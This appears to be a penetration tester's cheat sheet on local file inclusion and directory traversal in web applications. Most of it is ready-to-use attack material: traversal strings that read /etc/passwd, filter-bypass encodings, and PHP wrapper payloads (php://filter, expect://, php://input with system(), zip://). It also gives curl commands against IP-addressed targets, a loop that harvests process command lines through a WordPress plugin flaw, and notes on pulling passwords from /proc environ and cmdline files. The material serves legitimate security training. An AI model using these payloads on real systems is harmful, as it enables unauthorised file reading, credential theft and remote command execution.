# File Inclusion / Directory Traversal

[Hacktricks](https://book.hacktricks.xyz/pentesting-web/file-inclusion)

[PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion)

[Blog](https://www.netspi.com/blog/technical/web-application-penetration-testing/directory-traversal-file-inclusion-proc-file-system/) The Proc File System

[Tool ](https://github.com/D35m0nd142/LFISuite)[secondtool](https://github.com/kurobeats/fimap)

## LFI

```
 file:///../../../etc/passwd
 /etc/passwd on Linux or C:\Windows\boot.ini on Windows
 #if input from parameters used as part of filenames
 we can bypass by adding /../ in the
  
 # if Blacklisting is not coded correctly
 ..././ and ....// would become ../ vice vers sa
 cat .?/.*/.?/etc/passwd.
 Bash allows for for the ? and * wildcards to be used as wildcard
 
 #On PHP versions 5.3.4 and earlier, string-based detection could be bypassed by URL encoding the payload. 
 The characters ../ can be URL encoded into %2e%2e%2f, which will bypass the filter.
```

PHP provides various wrappers, which can be used for easier access to files, protocols, or streams. A list of wrappers can be found [here](https://www.php.net/manual/en/wrappers.php.php). The `php://` wrapper is enabled by default and interacts with IO streams.

PHP filter to convert file contents to Base64

```
 php://filter/read=convert.base64-encode/resource=/etc/passwd
 #we can get the source code and decode it
 curl http://134.209.184.216:32391/extension/index.php?language=php://filter/read=convert.base64-encode/resource=config
```

### PHP filter to convert file contents to ROT13

```
php://filter/read=string.rot13/resource=/etc/passwd
```

### Command execution with PHP `Expect` wrapper

```
expect://id
```

#### Using PHP `Input` wrapper for command execution

```
curl -s -X POST --data "<?php system('id'); ?>" "http://134.209.184.216:30084/index.php?language=php://input"
```

### Command execution with the PHP `Zip` wrapper

```
zip://malicious.zip%23exec.php&cmd=id
```

## The Proc File System

```
$ for i in `seq 1 10000`; do curl -s --output - http://$RHOST/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/$i/cmdline | grep -oaE 'cmdline.*?<script>' | sed "s/cmdline\/proc\/$i\/cmdline\/proc\/$i\/cmdline//" | sed "s/<script>//" | grep -avE '^$'; done
```

| Directory                       | Description                                                                                                                                                                                        |
| ------------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| /proc/sched\_debug              | This is usually enabled on newer systems, such as RHEL 6.  It provides information as to what process is running on which cpu.  This can be handy to get a list of processes and their PID number. |
| /proc/mounts                    | Provides a list of mounted file systems.  Can be used to determine where other interesting files might be located                                                                                  |
| /proc/net/arp                   | Shows the ARP table.  This is one way to find out IP addresses for other internal servers.                                                                                                         |
| /proc/net/route                 | Shows the routing table information.                                                                                                                                                               |
| /proc/net/tcp and /proc/net/udp | Provides a list of active connections.  Can be used to determine what ports are listening on the server                                                                                            |
| /proc/net/fib\_trie             | This is used for route caching.  This can also be used to determine local IPs, as well as gain a better understanding of the target’s networking structure                                         |
| /proc/version                   | Shows the kernel version.  This can be used to help determine the OS running and the last time it’s been fully updated.                                                                            |

| Directory            | Description                                                                                                                                                                           |
| -------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| /proc/\[PID]/cmdline | Lists everything that was used to invoke the process. This sometimes contains useful paths to configuration files as well as usernames and passwords.                                 |
| /proc/\[PID]/environ | Lists all the environment variables that were set when the process was invoked.  This also sometimes contains useful paths to configuration files as well as usernames and passwords. |
| /proc/\[PID]/cwd     | Points to the current working directory of the process.  This may be useful if you don’t know the absolute path to a configuration file.                                              |
| /proc/\[PID]/fd/\[#] | Provides access to the file descriptors being used.  In some cases this can be used to read files that are opened by a process.                                                       |